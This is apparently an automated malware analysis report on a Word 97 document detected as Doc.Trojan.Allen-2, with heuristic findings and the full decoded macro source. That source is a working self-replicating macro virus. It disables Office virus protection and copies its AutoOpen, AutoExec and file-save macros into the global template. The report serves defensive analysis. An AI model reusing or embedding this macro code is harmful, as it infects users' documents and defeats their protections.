Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3aa98c9d15cc7216…

MALICIOUS

Office (OLE)

Size: 39.5 KB
Created: 1997-10-01 13:36:00
Authoring application: Microsoft Word 8.0
First seen: 2012-10-10
MD5: d5b0689f2c36a71cf0445dd7adcc380e
SHA-1: f07b14e7ce793b63161e4bbec06b082cd85676ec
SHA-256: 3aa98c9d15cc72164bbc69ae1cddcbc2aada06f13c787f31ed7bd6838532654f
Risk Score: 228

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

This document contains legacy WordBasic macro virus markers and an AutoOpen macro, which are strong indicators of malicious intent. The ClamAV signature 'Doc.Trojan.Allen-2' further supports this assessment. The macro's primary function appears to be copying itself and potentially other macros to the global template, a common technique for persistence and propagation.

Heuristics (5)

  • VBA macros detected (severity: medium, 2 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering (severity: critical) OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • AutoOpen macro (severity: low) OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "AutoOpen"
  • Legacy WordBasic macro-virus markers (severity: high) OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • OLE document has large unaccounted-for region (severity: high) OLE_SLACK_ANOMALY
    OLE file is 40,448 bytes but its declared streams total only 20,586 bytes — 19,862 bytes (49%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2969 bytes
SHA-256: 972dbc554c4741ceebe1018b6912c0fe7cee837eb24959b0c5b65f3069e228bf
Detection
ClamAV: Doc.Trojan.Allen-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoExec"

Public Sub MAIN()
Attribute MAIN.VB_Description = "My Love to LIGUINA ALLENA HIVIANTA QUESTASARI"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "Normal.AutoExec.MAIN"
On Error GoTo tamat
Dim Bln
WordBasic.DisableInput 1
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Bln = WordBasic.Month(WordBasic.Now())
Dim Pesan1$, Pesan2$
Pesan1$ = "GepenkUajy96 Lahq"
Pesan2$ = "Cintaku tulus Buat sayangku Allena Hivianta Questasari"
WordBasic.ToolsOptionsUserInfo Name:="GepenkUajy96", Initials:="Allena", Address:="mlampah@hotmail.com" + Chr(13) + "Liguina Allena Hivianta Questasari"
     If Bln = 11 Then
      Assistant.Visible = True
        With Assistant.NewBalloon
            .Icon = msoIconAlert
            .Text = "SELAMAT ULANG TAHUN..ALLEN"
            .Heading = "God bless you"
            .Show
        End With
     End If
tamat:
End Sub

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
Attribute MAIN.VB_Description = "My Love to LIGUINA ALLENA HIVIANTA QUESTASARI"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "Normal.AutoOpen.MAIN"
Dim NFile$
Dim NMakro$
Options.VirusProtection = False
NFile$ = WordBasic.[FileName$]()
    On Error GoTo -1: On Error GoTo tamat
    NMakro$ = NFile$ + ":AutoExec"
    WordBasic.MacroCopy NMakro$, "Global:AutoExec"
    On Error GoTo -1: On Error GoTo tamat
    NMakro$ = NFile$ + ":AutoOpen"
    WordBasic.MacroCopy NMakro$, "Global:AutoOpen"
    On Error GoTo -1: On Error GoTo tamat
    NMakro$ = NFile$ + ":FileOpen"
    WordBasic.MacroCopy NMakro$, "Global:FileOpen"
    On Error GoTo -1: On Error GoTo tamat
    NMakro$ = NFile$ + ":FileSave"
    WordBasic.MacroCopy NMakro$, "Global:FileSave"
    On Error GoTo -1: On Error GoTo tamat
    NMakro$ = NFile$ + ":FileSaveAs"
    WordBasic.MacroCopy NMakro$, "Global:FileSaveAs"
    On Error GoTo -1: On Error GoTo tamat
    NMakro$ = NFile$ + ":Tools"
    WordBasic.MacroCopy NMakro$, "Global:FileTemplates"
    On Error GoTo -1: On Error GoTo tamat
    NMakro$ = NFile$ + ":Tools"
    WordBasic.MacroCopy NMakro$, "Global:FileMacro"
    On Error GoTo -1: On Error GoTo tamat
    NMakro$ = NFile$ + ":Tools"
    WordBasic.MacroCopy NMakro$, "Global:ToolsMacro"
    On Error GoTo -1: On Error GoTo tamat
    NMakro$ = NFile$ + ":Tools"
    WordBasic.MacroCopy NMakro$, "Global:ToolsCustomize"
      On Error GoTo tamat
      If Month(Now()) = 11 Then
      Assistant.Visible = True
        With Assistant.NewBalloon
            .Icon = msoIconAlert
            .Text = "SELAMAT ULANG TAHUN..ALLEN"
            .Heading = "My heart to you"
            .Show
        End With
       End If
tamat:
End Sub